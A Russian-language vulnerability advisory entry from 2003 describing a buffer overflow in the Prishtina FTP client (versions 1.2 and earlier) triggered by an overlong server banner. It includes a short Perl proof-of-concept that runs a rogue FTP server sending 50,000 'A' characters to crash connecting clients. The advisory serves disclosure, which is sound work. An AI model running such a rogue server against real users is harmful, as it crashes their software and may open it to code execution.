Дата публикации: | 28.05.2003 |
Всего просмотров: | 1041 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в Prishtina FTP клиенте. Удаленный пользователь может завершить работу клиента.
Damage Hacking Group сообщает, что удаленный FTP сервер может послать длинный FTP баннер к Prishtina FTP клиенту, чтобы аварийно завершить работу клиента и возможно выполнить произвольный код на целевой системе с привилегиями целевого пользователя. DoS эксплоит: #!/usr/bin/perl use IO::Socket; $host = "localhost"; $port = "21"; $server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n"; $data = "A"; $num = "50000"; $buf .= $data x $num; while ($client = $server->accept()) { print "OK"; print $client "$buf\n"; close($client);Уязвимость обнаружена в 1.2 и более ранние версии |
Ссылки: | Prishtina FTP v.1.*: remote DoS |